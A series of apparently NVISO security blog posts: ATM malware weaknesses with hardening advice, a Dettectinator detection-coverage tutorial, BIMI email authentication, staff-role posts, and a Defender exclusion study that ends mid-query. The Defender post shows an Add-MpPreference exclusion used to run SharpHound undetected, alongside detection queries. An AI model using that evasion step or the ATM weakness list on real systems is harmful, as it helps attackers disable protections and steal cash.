Input values within the user application via the touchscreen or pin pad, for example, are in turn processed by the software and then transmitted to other devices such as the cash dispenser via corresponding commands. This communication between the user application and internal devices takes place via the XFS standard (Extensions for Financial Services). This standard provides an interface (API) for the Windows Hardware Manager via which all applications can access it.

When the user initiates a transaction such as a cash withdrawal, the bank’s processing center is also contacted, which validates the transaction and ultimately transmits the confirmation for withdrawal. The connection between the ATM and the processing center is generally made via a cable, but occasionally also wirelessly (WiFi or GSM).

Overview ATM internals

Overview ATM

Vulnerabilities to ATM malware

In general, we classify ATM vulnerabilities regarding malware attacks into three categories. The combination of vulnerabilities from these categories allows an attacker to dispense all cash or attack other systems on the same network in many cases.

Insufficient physical security

The first step for malware-based attacks is usually to open the cabinet in order to interact with the integrated computer via a plugged-in keyboard or special USB stick. Here, we came into contact with recurring security vulnerabilities in various assessments:

  • The lock of the cabinet is insecure and can be opened with a lockpick within seconds.
  • The housing (door and walls) are made of thin plastic or sheet metal and can be destroyed with minor effort.
  • Locks from different ATMs can be opened with the same key. If an attacker obtains such a master key, they can often open all the ATMs in different branches.
  • The keys are not secure against copying. If an attacker obtains a key, it can be copied as often as desired.
  • Lack of security for e.g. USB interfaces. If an attacker succeeds in opening the cabinet, they will in almost all cases find unprotected (open) USB interfaces that allow interaction via keyboard.
Computer inside the cabinet with open USB port

Computer inside the cabinet with open USB ports

Insufficient configuration of the system and peripheral devices

It is often the case that the XFS standard for communication between OS and peripherals is configured very insecurely. There is often no authentication at all between the peripherals and the OS. An attacker with access to the computer could execute malware to communicate with the cash dispenser, and thus cash-out all available money. In summary, we found the following recurring security flaws in the system and device configurations:

  • Insufficient or even missing authentication between USB peripherals and the OS which would allow so called ATM black-box attacks.
  • Lack of communication encryption between OS and peripherals. An attacker can thus often read sensitive card data and transactions of the user.
  • Lack of hard disk encryption. An attacker can extract and read any hard disk content. In addition to various software that can be misused to further develop malware, we were also able to extract unencrypted videos and pictures of customers that were taken via the camera integrated in the ATM.
  • Inadequate protection of the kiosk mode. If an attacker manages to open the cabinet and plug in a keyboard, they can often break out of the banking application using special keyboard shortcuts and thus access the underlying Windows system. However, in some cases this is also possible via the touch screen of the machine without having to open the cabinet.
  • Boot from external storage media. ATMs are occasionally configured to boot from an attached storage medium such as a USB stick when they are restarted. If an attacker can boot into an alternative system in this way, hard disk contents can be completely extracted or even communicate directly with peripherals such as the cash dispenser.
  • Inadequate or missing application control configuration. Today’s malware or public enumeration tools are often executed via Powershell scripts or exe files. In many of our assessments, the case was that the execution of such software was insufficiently blocked or not blocked at all.
  • Weak or missing AV solutions. The installation and execution of tools and malware is not or often insufficiently detected because weak AV software are used for protection or these are not up to date.

ATM allows breaking out of the banking application using a connected keyboard, exposing that the current user has full administrative access.

Insufficient network security

An attacker with access to the ATM’s network interface (e.g. Ethernet) can attack other systems or services within the network. In one of our scenarios, it was even possible to dispense cash from all ATMs within the network. In general, such scenarios are based on the following vulnerabilities:

  • Lack of or insufficient network access control. An attacker who has been able to connect to the ATM network via Ethernet often has full authorization to communicate with other systems on the same network. In many cases, infiltration of other devices or even the Active Directory is possible.
  • Unencrypted communication to the backend. An attacker in a man-in-the-middle position between the processing center and the ATM can read sensitive transaction data, but also manipulate it to issue malformed funds.
  • Lack of or insufficient authentication to the exposed ATM network service. Often, own (spoofed) backend commands can be sent to the exposed ATM service to make it cash out.
Example - Bypassing outdated NAC (Network Access Control) with public tools

Example – Bypassing outdated NAC (Network Access Control) with public tools

Attack Scenarios

Due to the large number of possible vulnerabilities, individual malware-based attack scenarios often arise. The following figure shows general attack scenarios, which are also performed in our assessments.

Overview - Attack scenarios

Recommendations

In general, it is difficult to make all-encompassing recommendations for securing ATMs. Even in our current assessments, we are increasingly confronted with new and very individual security vulnerabilities. However, we can make general recommendations for securing ATMs against malware attacks, as some vulnerabilities are present on a regular basis:

  • The computer should be in the safe. Securing the computer in the safe would probably be the best possible protection against malware-based attacks. Unfortunately, we could not detect such a protection in any of our analyses so far.
  • If it is not possible to place the computer in the safe:
    • The cabinet housing and door should also be made of solid material. It should not be possible to open the lock of the cabinet using a lockpick. Generally, security locks or even digital locks with proper auditing possibilities should be used here. The cabinet of each ATM should only be able to be opened with an individual key.
    • Network devices such as switches should not be placed outside the ATM.
  • All communication between ATM and backend should be encrypted according to current standards.
  • All transactions between the ATM and the backend should be mutually authenticated for example using TLS mutual authentication.
  • All unused services exposed by the ATM should be turned off.
  • The firewall between the ATM and backend should be configured to allow remote access only to the service that is needed. All network services that are not needed should be turned off.
  • Remote access should follow strict password policies or even better: key-based authentication mechanisms.
  • Any communication between the OS and peripherals such as the cash dispenser should be encrypted. Here the ATM vendor can be consulted since it is usually a simple configuration that can be enabled.
  • The OS as well as used applications should be updated regularly including hotfixes.
  • It should not be possible to connect any peripheral (e.g. keyboard) to the computer and use it. One possibility would be to use local OS policies or third-party software to allow only explicit devices. However, one should be careful with such whitelisting, as the device IDs themselves can be spoofed.
  • The execution of scripts or other software should be limited as much as possible and be restricted to only what is necessary. One possibility would be the use of Windows Applocker.
  • Any software that is not needed (e.g. software used for development) should be removed.
  • Hard disks should be fully encrypted.
  • Access to the BIOS should be protected by e.g. setting a strong password.
  • A boot from the hard disk of the ATM should be forced. It should not be possible to access the boot menu without authentication. In addition make sure to enable measured boot.
  • AV solutions should be used and regularly updated. In general, we prefer the use of Windows Defender over third-party software.
  • Abnormal behavior or communication regarding network but also peripherals should be logged and alarms triggered.

Conclusion

Malware-based attacks that rely on physical access are becoming increasingly popular. Today, however, we can already see some security improvements in current assessments. However, our experience shows that the improvement within the last years is still insufficient. Many protections could still be circumvented to exploit initial vulnerabilities. This is usually not because manufacturers and banks deliberately avoid security precautions, but because the whole environment and its processes often do not allow simple security upgrades. Some examples are that to ensure proper network access control (NAC), all switches within all branches would have to be replaced, technical staff still needs an interface (e.g. USB) to perform administrative tasks on the ATM, etc.

In general, it turns out that criminal hacker gangs are always one step ahead and find ways to bypass current security measurements.

About the Author

Alexander Poth

Alexander is a senior security consultant at NVISO. He regularly performs a variety of assessments, including IoT and embedded devices, Web and Mobile applications.

DeTT&CT: Automate your detection coverage with dettectinator

4 January 2023 at 08:08

Introduction

Last year, I published an article on mapping detection to the MITRE ATT&CK framework using DeTT&CT. In the article, we introduced DeTT&CT and explored its features and usage. If you missed it, you can find the article here.

Although, after writing that article, I encountered some challenges. For instance, I considered using DeTT&CT in a production environment but there were hundreds of existing detection rules to consider, and it would have been a tedious process to manually create the necessary YAML file for building a detection coverage layer. As a result, I decided not to use DeTT&CT and instead focused on increasing detection in other ways.
Fortunately, a new tool called Dettectinator has recently been released. Its purpose is to address these kinds of issues and make it easier to automate detection coverage.

In this article, we will explore Dettectinator, its features, and walk through the steps to automate the detection coverage for Sentinel Analytics rules and Elastic detection rules.

What is dettectinator

Dettectinator is a tool developed by Martijn Veken and Ruben Bouman of Sirius Security that enables the automation of DeTT&CT data source and technique administration YAML files needed to create visibility and detection layers in the ATT&CK Navigator. This tool can be integrated as a Python library within your security operations center (SOC) automation tools or used via the command line.

To use the Python library, install it with “pip install dettectinator” and import one of the following classes into your code:

  • DettectDataSourcesAdministration
  • DettectTechniquesAdministration

These classes allow you to programmatically edit DeTT&CT YAML files, including creating new data source and techniques administration files and modifying existing ones.

from dettectinator import DettectDataSourcesAdministration
from dettectinator import DettectTechniquesAdministration

# Open an existing YAML file:
dettect_ds = DettectDataSourcesAdministration('data_sources.yaml')

# Or create a new YAML file:
dettect_ds = DettectDataSourcesAdministration()

# Open an existing YAML file:
dettect = DettectTechniquesAdministration('techniques.yaml')

# Or create a new YAML file:
dettect = DettectTechniquesAdministration()

To run as a CLI tool:

$ python dettectinator.py

Please specify a valid data import plugin using the "-p" argument:
 - DatasourceCsv
 - DatasourceDefenderEndpoints
 - DatasourceExcel
 - DatasourceWindowsSecurityAuditing
 - DatasourceWindowsSysmon
 - TechniqueCsv
 - TechniqueDefenderAlerts
 - TechniqueDefenderIdentityRules
 - TechniqueElasticSecurityRules
 - TechniqueExcel
 - TechniqueSentinelAlertRules
 - TechniqueSigmaRules
 - TechniqueSplunkConfigSearches
 - TechniqueSuricataRules
 - TechniqueSuricataRulesSummarized
 - TechniqueTaniumSignals
$ python3 dettectinator.py -p TechniqueElasticSecurityRules -h

Plugin "TechniqueElasticSecurityRules" has been found.
usage: dettectinator.py [-h] [-c CONFIG] -p PLUGIN -a APPLICABLE_TO [-d {enterprise,ics,mobile}] [-i INPUT_FILE] [-o OUTPUT_FILE] [-n NAME] [-s STIX_LOCATION] [-ch] [-cl] [-ri RE_INCLUDE] [-re RE_EXCLUDE]
                        [-l LOCATION_PREFIX] [-clp] --host HOST --user USER --password PASSWORD [--filter FILTER]

Dettectinator provides a range of plugins for various detection systems and data source platforms, and you can even create custom plugins to suit your specific workflow. Some of the available plugins for detection include:

  • Microsoft Sentinel: Analytics Rules (API)
  • Microsoft Defender: Alerts (API)
  • Microsoft Defender for Identity: Detection Rules (loaded from MS Github)
  • Tanium: Signals (API)
  • Elastic Security: Rules (API)
  • Suricata: rules (file)
  • Suricata: rules summarized (file)
  • Sigma: rules (folder with YAML files)
  • Splunk: saved searches config (file)
  • CSV: any csv with detections and ATT&CK technique ID’s (file)
  • Excel: any Excel file with detections and ATT&CK technique ID’s (file)

Plugins for data sources include:

  • Defender for Endpoints: tables available in Advanced Hunting (based on OSSEM)
  • Windows Sysmon: event logging based on Sysmon (based on OSSEM and your Sysmon config file)
  • Sentinel Window Security Auditing: event logging (based on OSSEM and EventID’s found in your logging)
  • CSV: any csv with ATT&CK data sources and products (file)
  • Excel: any Excel file with ATT&CK data sources and products (file)

It’s easy to create your own Dettectinator plugins or edit the ones provided to cover additional scenarios. An instruction on how to create your own plugins can be found here.

Dettectinator can be seamlessly integrated into your detection engineering workflow, as illustrated in the picture below. Steps 1 and 3 can be automated using version control system (VCS) pipelines or scheduling. The analyst can enhance the techniques identified by Dettectinator by assigning appropriate scores, resulting in an enriched YAML file that can be used in future runs of the tool.

Dettectinator workflow
Figure 1: Dettectinator workflow

How to use dettectinator

To illustrate how to use Dettectinator from a production environment, we will walk through the steps to build your coverage from Elastic Security detection rules and Microsoft Sentinel analytics rules.

Let’s start with Elastic Security. As shown in the picture below, we enabled the built-in detection rules from Elastic which represent 724 rules in total.

Elastic Security detection rules
Figure 2: Elastic Security detection rules

Ensure that the Elastic user has the appropriate permissions to manage/read the detection rules. Refer to the Elastic documentation for more information.

In our testing environment, we created a dedicated user and assigned it a custom role (as shown in the highlighted parameters):

Elastic detection permissions role
Figure 3: Elastic detection permissions role

With the command below, we will generate the technique administration YAML file which we will use to create the ATT&CK Navigator layer:

$ python3 dettectinator.py -p TechniqueElasticSecurityRules -a Windows -d enterprise -o elasticrules_techniques.yaml –host “<URL>:<Port>” --user <username> --password <password>  
  • -p: specify the plugin
  • -a: Systems that the detections are applicable to (comma separated list)
  • -d: ATT&CK domain to use {enterprise, ics, mobile} (default = enterprise)
  • -o: YAML filename for output
  • –host: Elastic Security host
  • –user: Elastic Security username
  • –password: Elastic Security user’s password
Dettectinator Elastic Security Rules plugin
Figure 4: Dettectinator Elastic Security Rules plugin

Using the DeTT&CT Editor, we were able to modify the technique administration YAML file. Alternatively, we could use the output to generate a detection ATT&CK Navigator layer through the DeTT&CT Command Line Interface (CLI).

DeTT&CT Editor
Figure 5: DeTT&CT Editor

To generate the detection layer, we used the following command:

$ python3 dettect.py d -ft <YAML file generated by dettectinator> -l
  • d: detection coverage mapping based on techniques
  • -ft: path of the technique administration YAML file
  • -l: generate a data source layer for the ATT&CK Navigator

The tool dettect.py generated a JSON file that can be opened within ATT&CK Navigator.

In this case, we get a quick overview of the built-in Elastic Security detection rules. All techniques are assigned a default score of ‘1’ by dettectinator. This scoring can be customized using the DeTT&CT Editor.

Detection coverage layer
Figure 6: Detection coverage layer

When hovering over the ATT&CK techniques and sub-techniques, additional information such as related detection rules and comments generated by dettectinator will appear.

Here is an example for the technique Lateral Tool Transfer (T1570):

Detection layer - details
Figure 7: Detection layer – details

Now, let’s check the detection coverage from an existing Microsoft Sentinel environment with Analytics rules.  In our testing example, we created an “App Registration” in Azure and granted it the following permissions:

App Registration permissions
Figure 8: App Registration permissions

Since we are using delegated permissions, we also had to enable “Allow public client flows” in the Authentication settings for the App Registration.

To generate the technique administration YAML for Microsoft Sentinel, we used the following command:

$ python3 dettectinator.py -p TechniqueSentinelAlertRules -a Windows -o sentinel_techniques.yaml --subscription_id <subscription_id> --resource_group <resource group name> --workspace <workspace name> --tenant_id <tenant_id> --app_id <app_id>
Dettectinator - Microsoft Sentinel Techniques
Figure 9: Dettectinator – Microsoft Sentinel Techniques

Dettectinator generated a JSON file containing information about a single technique. As shown in the picture below, our test Microsoft Sentinel environment contains 5 analytics rules, but only one of them as a technique specified in the metadata. As a result, Dettectinator was able to map the analytic rules to only one technique (T1190).

Microsoft Sentinel Analytics Rules
Figure 10: Microsoft Sentinel Analytics Rules
Microsoft Sentinel detection coverage
Figure 11: Microsoft Sentinel detection coverage

Conclusion

Dettectinator is a highly efficient tool that can help you optimize your detection engineering processes. By automating certain tasks, it frees up your time and resources to focus on more complex, high-level tasks.

When used in conjunction with DeTT&CT, it provides a real-time overview of your current detection coverage, giving you a clear understanding of your strengths and areas for improvement. Additionally, Dettectinator comes equipped with a range of integrations that are suitable for a variety of environments, making it a versatile and efficient tool.

In addition to its automation capabilities, Dettectinator is also highly customizable. It allows you to tailor its functionality to meet the specific needs of your organization or project.

One of the key benefits of using Dettectinator is its ability to save users a considerable amount of time. It complements DeTT&CT by addressing some of the challenges that users may face, making it an invaluable addition to any detection engineering workflow. In short, if you’re looking to streamline your detection processes and improve your coverage, Dettectinator is an excellent tool to consider.

References

“Dettectinator”, https://github.com/siriussecurity/dettectinator

“Releasing Dettectinator”, https://www.siriussecurity.nl/blog/2022/11/03/releasing-dettectinator

“DeTT&CT : Mapping detection to MITRE ATT&CK”, https://blog.nviso.eu/2022/03/09/dettct-mapping-detection-to-mitre-attck/

“rabobank-cdc/DeTTECT: Detect Tactics, Techniques & Combat Threats”, https://github.com/rabobank-cdc/DeTTECT

“ATT&CK® Navigator“, https://mitre-attack.github.io/attack-navigator/

About the author

Renaud Frère
Renaud Frère

Renaud is an Incident Response Consultant within the CSIRT team at NVISO with a focus on digital forensics including mobile device forensics. He is also involved in various projects related to Threat Hunting, Detection Engineering and Threat Intelligence. Occasionally, Renaud likes to participate in DFIR CTFs and Netwars.

The Beauty of Being a Cybersecurity Project Manager for NVISO NITRO MDR

19 December 2022 at 08:00

All Project Managers might agree with this: working as a Project Manager is exciting as no two days are ever the same.

Just like a conductor of an orchestra leads all musicians to bring harmonic masterpieces to life, so does the cybersecurity Project Manager leading and coordinating the different stakeholders to bring a project to completion, while overseeing all aspects of it.

Within the Managed Detect and Respond (MDR) Service at NVISO, we, cybersecurity Project Managers, handle several unique projects at the same time, making sure that the onboarding of new clients and the services provided to them as well as to current ones are properly handled on time and within scope. Within our agile company, we implement cyber strategies to provide the best possible service to safeguard our clients from cyber-attacks.

In order to ensure that all deliverables are duly met on time and that risks are mitigated, we create a detailed project plan taking into consideration all the variables and the different teams of engineers and analysts from the client’s and NVISO’s side working on each project. 

Once the project scope has been clearly defined and agreed upon by all parties, we manage the project through all its phases, working closely with our colleagues. We plan the set of activities that need to be undertaken and the relative deadlines, we define priorities, requirements, and success criteria, assign specialist work and make sure that everything is being monitored and delivered as agreed. Similar to the conductor of the orchestra, we set the tempo and ensure that the different groups of instruments, the woodwinds, percussion, brass, strings, and keyboards, all work harmoniously together to deliver their best performance.

Working as a Project Manager is an art, and it requires strong skills. Most importantly a passion for cybersecurity and a client-oriented mindset. Good communication skills are key to the success of a project. Being able to clearly communicate to all different stakeholders and ensuring that the most technical parts of a cybersecurity project are fully understood by all parties is the basis of a good start and development of a project. 

Being able to properly plan and organise is another strong skill that cybersecurity Project Managers need to have. We work in a fast-paced environment, therefore having proper time management and task prioritization skills is essential, as well as ensuring that everything is prepared for the project initiation, building, and testing phases, up until the project closure and its transition to the ongoing service.

Sometimes, unforeseen events happen despite having carried out extensive preparation to mitigate risks. The ability to solve problems and manage conflicts within the team makes a huge difference in the success of a project and is a key skills that Project Managers need to have.

Cybersecurity is a dynamic and evolving sector, and we, cybersecurity Project Managers, have the privilege of being right at the centre of the action. We make projects come to life, and seeing the satisfaction of the clients for the results provided and the fulfilment of the colleagues for the great work done is what makes our job so worth it. 

NVISO provides a variety of services where a cybersecurity Project Manager plays a key role. More information on NVISO’s services can be found here.

Maria Rita Milanese
Maria Rita Milanese

Maria Rita Milanese is a Senior Cybersecurity Consultant working as Project Manager & Service Delivery Manager at NVISO in the CSIRT&SOC Department.

The Key Role of the Service Delivery Manager at NVISO’s Managed Detect & Respond Service

16 December 2022 at 08:00

The Service Delivery Manager (SDM) plays a key role in the delivery of our NVISO cybersecurity NITRO Managed Detect & Respond (MDR) services. As the main point of contact, we represent the client at NVISO and represent NVISO at the client. During the operational lifecycle of a contract, my fellow SDMs and I are responsible for the quality of the cybersecurity services delivered and we ensure an efficient relationship and coordination between the customer and the various NVISO internal departments engaged in the delivery of these services.

NVISO’s NITRO Managed Detect & Respond Service

The NITRO Platform is at the heart of NVISO Managed Services’ offering. The platform is built to support Security Operations, integrating a variety of security technologies to enable efficient orchestration, automation, and response.

Overview of services provided within the NITRO Platform

As part of the NITRO Platform, NVISO has created an MDR service where we combine the latest technology with the best cyber security experts in Europe in order to respond to the many cyber challenges that enterprises encounter.

The automations, part of the NITRO platform, combined with the in-depth analysis from our security experts result in an effective and efficient MDR service providing our customers triaged incidents with clear actions and recommendations.

In addition, in case of any critical incidents that require an emergency response, our clients can request the intervention of NVISO’s 24/7 Cyber Security Incident Response Team (CSIRT). The CSIRT team can provide in-depth technical services and on-site crisis management support in order to handle any high-severity incidents.

More information on the MDR service provided by NVISO can be found here.

NVISO’s customer dedication and strong reputation

Our customers value NVISO for its client commitment and recognise our strong reputation on providing in-depth technical expertise. As a strongly client-facing role, my fellow SDMs and I build trustworthy relationships with our customers and we understand their business environment and unique requirements. We ensure all contractually agreed services are smoothly and seamlessly delivered and we ensure clients’ requests are handled in an efficient and timely manner.

For clients of the SDM service, we organise monthly and strategic quarterly service delivery meetings including, amongst other, a detailed status report of security events and incidents handled in the reporting period, an analysis of the SLAs (Service Level Agreements) and overall scope of service. We also discuss any open action items and provide an overview of new engineering features and developments.

Client Portal

Whilst an overview of events and cases is presented to the client on a monthly and quarterly basis, clients can also use the NITRO Client portal to obtain their MDR data in real time.

Clients can access the platform at any time and choose the timeframe that they prefer. They can then start navigating through their events and security cases, which are also visually represented through graphs and charts. 

Dashboard of the NVISO NITRO Client Portal

The platform was developed in-house by NVISO engineers, and it is continuously improved with new features.

The Service Delivery Manager makes a difference in the service

Having a Service Delivery Manager is a great advantage which has a positive impact on the service received by our customers. The SDM is responsible to drive service delivery and problem resolution,  she/he represents the client’s business, and ensures all is delivered on time and within scope. As a consequence, the clients feel confident that the service is provided at the highest quality standards and that their requests are being heard. For NVISO, client satisfaction is a priority. Therefore, we always strive to build out solid processes to ensure that satisfaction is as high as possible.

About the Author

Maria Rita Milanese
Maria Rita Milanese

Maria Rita Milanese is a Senior Cybersecurity Consultant working as Project Manager & Service Delivery Manager at NVISO in the CSIRT&SOC Department.

Lower email spoofing incidents (and make your marketing team happy) with BIMI

13 December 2022 at 09:00

Introduction

Over the last couple of years, we saw the amount of phishing attacks skyrocket. According to F5, a multi-cloud security and application provider, there was a 220% increase of incidents during the height of the global pandemic compared to the yearly average. It’s expected that every year there will be an additional increase of 15% in phishing attempts, making it one of the most threatening security risks for a company’s IT department.

Email Spoofing

While several malicious actors try to target an employee with an email from what looks like a (very) legitimate domain, there are also a lot of email spoofing incidents, which are more difficult to distinguish from non-phishing emails for the target employee. Its goal is to fool users into believing that the message comes from a person or entity they either know or can trust. The sender sends an email using forged email headers to convince an email client software of the legitimacy of the message. By examining the header of the mail closely, it is possible to find the false address. But many users will not suspect a fraudulent email from the sender he knows. So, they can easily click malicious links or send sensitive data without considering the risks involved.

SPF, DKIM and DMARC

There are several known frameworks to prevent email spoofing, and these are already commonly used by businesses: SPF, DKIM and DMARC. This to the extent that some mail servers will reject emails that do not comply with these frameworks.


Sender Policy Framework (SPF) works by verifying the identity of the sender of an email by comparing the sender’s IP address to a list of authorized IP addresses that are published in the domain’s DNS records.


With DomainKeys Identified Mail (DKIM), a digital signature is attached to the email which can be used by the recipient to verify the authenticity of the sender.


And finally, Domain-based Message Authentication, Reporting, and Conformance (DMARC). By building on the SPF and DKIM standards, it provides a more comprehensive approach to email authentication. DMARC allows the owner of a domain to publish a policy in their DNS records that specifies which mechanisms are used to authenticate emails sent from their domain, and what to do if an email fails authentication.


When correctly configuring your DNS, you can already go a long way into lowering the chances of a spoofing attempt. But there is still the low risk of messages with malicious links arriving in the inbox of the receiver or legitimate mails being flagged as spam and eventually deleted. By setting up BIMI, you can have that extra security layer while giving your sent emails more exposure with your brand logo.

What is BIMI?

BIMI (Brand Indicators for Message Identification) is a recently (2020) introduced email standard, which makes use of the brand logo of the business as a security control. When configured correctly, client mail software can verify the legitimacy of the received mail by comparing it with the BIMI record in the DNS of the sender.

BIMI-group logo

Preparation for BIMI

When setting up BIMI you need to correctly configure SPF, DKIM and DMARC. Otherwise, the receiver mail software will already fail verification before it even checks the added brand logo. This means:

  • Email service providers are added to the SPF record and set to hard fail (‘-all’)
  • DKIM is configured for all the email service providers and the public key is reachable
  • DMARC is fine-tuned. Recommended is to have the policy set on quarantine or reject, and pct to 100.

So, make sure these are checked and analyse the DMARC reports before implementing BIMI.

At the moment of writing this blog, there is still a limited list of mailbox providers that supports the implementation and verification of BIMI. Google and Apple mail are one of the most used providers in this list (Link), but many will join in the future as BIMI will become a more commonly used standard. Noticeably, Microsoft (Outlook) has not even considered to implement the email standard.

BIMI Example in Gmail Inbox

BIMI Setup

The majority of the work is creating the BIMI SVG Logo files. We recommend using an SVG formatted file which is hosted publicly and can be accessed via HTTPS. It can help to use the SVG conversion tool from the BIMI-group.

When the SVG is in place, you can add the DNS record which begins with the tag “v=BIMI1” and includes the parameter “l=logoURL” where you fill in the link to your externally accessible logo. You can use the BIMI Inspector, which generates a record for you.

Optionally you can use VMC (Verified Mark Certificate), a proof that you own the trademark for your brand logo. By adding this you increase the legitimacy, but this isn’t required yet. This is included in the DNS record together with the URL pointing to the logo’s location.

Conclusion

Now you know what BIMI is, why should you consider configuring this email standard? There are two major reasons:

  1. It providers extra security against email spoofing
  2. it makes your sent mails standout between all the other marketing mails.

If you want more info on the standard, we recommend checking the website of the group: https://bimigroup.org/

About the author

Karsten De Baere
Karsten De Baere

Karsten is a Senior Security Consultant in the Cyber Strategy and Architect team at NVISO. He assists organisation with assessing and implementing new practices in the SSDLC. In his off time, Karsten likes to do extensive research on new security topics and play with the latest automation gadgets.

Can we block the addition of local Microsoft Defender Antivirus exclusions?

2 December 2022 at 09:00

Introduction

A few weeks ago, I got a question from a client to check how they could prevent administrators, including local administrators on their device, to add exclusions in Microsoft Defender Antivirus. I first thought it was going to be pretty easy by pushing some settings via Microsoft Endpoint Manager. However, after doing some research and tests in a lab environment, I discovered that it might not be as easy as I thought.

What capabilities in Microsoft Defender Antivirus can help us?

Microsoft Defender Antivirus, which is part of the Microsoft Defender for Endpoint (MDE), is one component of the next-generation protection solution. Microsoft Defender Antivirus comes with different features that can be configured using Microsoft Endpoint Manager (MEM)/Intune, Group Policy, PowerShell, etc. These features include cloud-delivered and real-time protection with behavioral, heuristic and machine learning-based protection.

Because some business applications might be blocked by these capabilities, there is the possibility to create specific exclusions for files, processes and processed-opened files from Microsoft Defender Antivirus scans, real-time protection and monitoring. Although they can be useful to benefit from the protection capabilities while preventing any impact on end users and business flows, they represent a protection gap. Indeed, the more exclusions there are, the larger the attack surface is. Therefore, it is a best practice to keep them as limited as possible and to review them periodically.

Because these are protection gaps, you don’t want users from adding exclusions locally on their laptop. By default, standard users can’t change, add or remove exclusions. However, administrators can. This is where our problems start. Indeed, we want to prevent that users help themselves to install suspicious software and we don’t want attackers that would have gained sufficient privileges to add exclusions so that they can install and run their malicious payloads.

How can we prevent users from adding exclusions? We can? Right? We will go over different possibilities in Microsoft Defender for Endpoint to do so.

Tamper Protection

First, let’s have a look at Tamper Protection. By searching on the Internet, I found a few posts mentioning that Tamper Protection could help us to solve this issue.

Tamper Protection is a feature that allows to protect specific protection settings against tampering as its name suggests. The main objective of Tamper Protection is to make sure attackers can’t disable security features to get easier access to your data, install malware or run exploits. In practice, Tamper Protection allows to prevent the following:

  • Disabling virus and threat protection
  • Disabling real-time protection
  • Turning off behavior monitoring
  • Disabling antivirus protection, such as IOfficeAntivirus (IOAV)
  • Disabling cloud-delivered protection
  • Removing security intelligence updates
  • Disabling automatic actions on detected threats
  • Suppressing notifications in the Windows Security app
  • Disabling scanning of archives and network files

Therefore, we can already see that this is not going to help us here. I can also confirm this based on the tests that I have done. During the tests, Tamper Protection is enabled at the tenant level in the Microsoft 365 Defender portal and therefore applied to all devices by default.

Local Admin Merge

Secondly, we have the Defender “local admin merge” feature. This capability looks more interesting. Indeed, it allows to control if exclusion list settings, which are configured by a local admin, will merge with managed settings from an Intune policy. We can use a Microsoft Defender Antivirus profile in Microsoft Endpoint Manager to configure it:

Enforce "Disable Local Admin Merge" in an Antivirus profile in MEM
Enforce “Disable Local Admin Merge” in an Antivirus profile in MEM

Three values are supported for the Disable Local Admin Merge:

  • Not configured: preference settings configured by local administrators will be merged into the resulting effective policy. If there are conflicts, settings from Intune will override local preference settings.
  • Enable Local Admin Merge: same as Not configured.
  • Disable Local Admin Merge: Intune-managed settings override preference settings that are configured by local administrators.

Theoretically, the Disable Local Admin Merge value would allow to prevent local admins from creating exclusions. We will test that in a moment, but let’s check first if this setting is correctly applied on my device. In the registry editor, I verify that the DisableLocalAdminMerge key is set to 1:

DisableLocalAdminMerge key set to 1 (enforced)
DisableLocalAdminMerge key set to 1 (enforced)

It seems to be the case here, great! If we go to Windows Security on the local machine, we can see that exclusions already exists and that we can’t add or manage them. This is because these policies have been pushed through Intune:

Existing exclusions configured via Intune
Existing exclusions configured via Intune

We will now see if we can still add local exclusions to download and run malicious software. First, if we try to download SharpHound for example, it will end up in the user’s download folder and get removed automatically:

Windows Security alert: Threat found
Windows Security alert: Threat found

As mentioned before, exclusions can be managed in PowerShell. We will add an exclusion for our download folder using the Add-MpPreference -ExclusionPath 'C:\Users\<USERNAME>\Downloads' (make sure to replace <USERNAME>) PowerShell cmdlet. Moreover, we can verify the exclusions that currently apply using Get-MpPreference as shown below:

Current exclusions in Microsoft Defender Antivirus
Current exclusions in Microsoft Defender Antivirus
Current exclusions in Microsoft Defender Antivirus

It looks like our exclusion has been successfully added (see ExclusionPath). Once added, SharpHound can be downloaded and is not removed by Microsoft Defender Antivirus. Additionally, if we bypass the Windows antimalware warning, it can be executed (my machine is not joined to any domain hence the error in SharpHound):

Run SharpHound
Run SharpHound

Note that alerts will still be generated in Microsoft 365 Defender for this action because the endpoint detection and response (EDR) capability of Microsoft Defender for Endpoint is running and antivirus exclusions do not apply to it. Indeed, the purpose of EDR is to detect post-breach activities. Usually, EDR is set in block mode to remediate these post-breach detections when a non-Microsoft antivirus product is running.

EDR detection for SharpHound

Based on that, it seems that Disable Local Admin Merge does not allow us to prevent local admins from adding exclusions via PowerShell. Note that it will also be the case via WMI using the MSFT_MpPreference class. In fact, from what I have observed during my testing is that the created exclusions will be overwritten when the device is restarted or when policies are pushed again. However, it did allow us to download and run SharpHound during this time.

Hide Exclusions From Local Admins

The last feature that I wanted to talk about is the Hide Exclusions From Local Admins setting. This setting is not available in Microsoft Defender Antivirus profile yet but can already be configured with a custom configuration profile or with a Group Policy, for example. When enabled, all exclusions in PowerShell, Windows Security and registry editor are not visible to administrators.

It can be configured using the following registry key: Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\HideExclusionsFromLocalAdmins.

Hide exclusions from local admins registry key
Hide exclusions from local admins registry key

If the value is set to 1 as it is currently the case, it blocks all access to exclusions to administrators as shown below:

  • Registry Editor:
Exclusions in Registry Editor can't be accessed
Exclusions in Registry Editor can’t be accessed
  • Windows Security application
Exclusions in Windows Security can't be accessed
Exclusions in Windows Security can’t be accessed
  • PowerShell
Exclusions can't be accessed using Defender PowerShell cmdlet
Exclusions can’t be accessed using Defender PowerShell cmdlet
Exclusions can't be accessed by browsing registry keys in PowerShell
Exclusions can’t be accessed by browsing registry keys in PowerShell

However, it does not allow to block admins from adding exclusions. Indeed, it only blocks them from accessing exclusions.

Detection

At the time of writing, there is currently no method to block administrators from adding exclusions. As a general guidance, it is a best practice to avoid granting local administrator permissions to users on their machine. However, it might not always be possible for multiple reasons. In this case, it might be interesting to implement detection measures.

In the Microsoft 365 Defender portal, custom detection rules can be created to detect and alert when such events occur. Moreover, if Microsoft Defender for Endpoint events are connected in Microsoft Sentinel, an analytics rule could also be created. We will focus on creating a custom detection rule in Advanced Hunting in the Microsoft 365 Defender portal as part of this blog post.

When adding an exclusion in Microsoft Defender Antivirus, a registry key is created. Therefore, we can query the DeviceRegistryEvents with the following Advanced Hunting query:

DeviceRegistryEvents
| where ActionType == "RegistryValueSet"
| where RegistryKey contains "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions"

However, during my tests, I have noticed that exclusions are pushed again every time a device is restarted when configured in Intune. Therefore, this would generate a lot of false positives. To prevent that, exclusions could be defined in the query to make sure the rule only triggers on non-legitimate exclusions.

let exclusions = dynamic ([
"C:\\myapp",
"myapp.exe",
".app"
]);
DeviceRegistryEvents
| where ActionType == "RegistryValueSet"
